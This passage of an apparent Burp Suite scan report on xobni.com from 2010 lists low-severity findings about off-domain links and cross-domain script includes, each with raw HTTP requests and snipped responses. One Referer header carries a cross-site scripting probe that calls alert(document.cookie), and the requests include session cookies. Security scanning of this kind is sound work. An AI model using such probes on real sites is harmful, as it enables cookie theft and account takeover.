   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.15. http://www.xobni.com/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/?view=192 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 202358

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni: What parts
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</a> of Xobni for Outlook supports the majority of the <a href='http://code.google.com/apis/gadgets/docs/reference/'>Google Gadgets API</a>
...[SNIP]...
</script>-->

<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

11.16. http://www.xobni.com/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/?view=150 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 204589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni: Why is Out
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
<br />
See this <a href='http://support.microsoft.com/kb/940226'>Microsoft article</a>
...[SNIP]...
<br />
See this <a href='http://support.microsoft.com/kb/870553'>Microsoft article</a>
...[SNIP]...
</script>-->

<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

11.17. http://www.xobni.com/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/?view=29 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 201678

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni: I can't in
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
<br />
When connected to the internet, download the .Net framework (available <a href='http://www.microsoft.com/Net/Download.aspx' target='_blank'>here</a>
...[SNIP]...
</b>This Windows component is required to install Xobni. You can download it from Microsoft <a href='http://www.microsoft.com/downloads/details.aspx?FamilyID=889482FC-5F56-4A38-B838-DE776FD4138C&displaylang=en' target=_'blank'>here</a>
...[SNIP]...
</script>-->

<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

11.18. http://www.xobni.com/support/contact_form

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/contact_form

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /support/contact_form?type=billing HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6701
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>Contact</TITLE>
   <link rel='stylesheet' href='/csscache/1256842155/style
...[SNIP]...
<!-- Must include trailing script end tag or thickbox js breaks -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12. Cross-domain script include
There are 135 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


12.1. http://www.xobni.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.1.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 21477

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</h3>
       
       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

12.2. http://www.xobni.com/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /about/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.9.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 12451

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni, the Outloo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.3. http://www.xobni.com/about/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /about/contact

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/contact HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11770

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Search Yo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.4. http://www.xobni.com/about/jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /about/jobs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/jobs HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12089

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Jobs</TITLE>
   <me
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.5. http://www.xobni.com/about/jobs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /about/jobs.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/jobs.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/about/contact
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12101

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Jobs</TITLE>
   <me
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.6. http://www.xobni.com/about/opensource

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /about/opensource

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/opensource HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9208

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Search Yo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.7. http://www.xobni.com/about/opensource.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /about/opensource.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/opensource.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9220

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Search Yo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.8. http://www.xobni.com/account/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /account/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /account/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.7.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 10304

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<link rel='stylesheet' href='/csscache/1265760498/styles/account.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.9. http://www.xobni.com/admin/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /admin/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /admin/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/robots.txt
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:18:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7898

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.10. http://www.xobni.com/advanced-search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /advanced-search

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /advanced-search HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12676

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Advanced Search f
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.11. http://www.xobni.com/autosuggest-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /autosuggest-outlook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /autosuggest-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12019

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Rank Powere
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.12. http://www.xobni.com/blackberry

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /blackberry

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blackberry HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=fr
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15880

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.13. http://www.xobni.com/csscache/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /csscache/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /csscache/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:10:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7703

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.14. http://www.xobni.com/csscache/1256842155/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /csscache/1256842155/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /csscache/1256842155/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
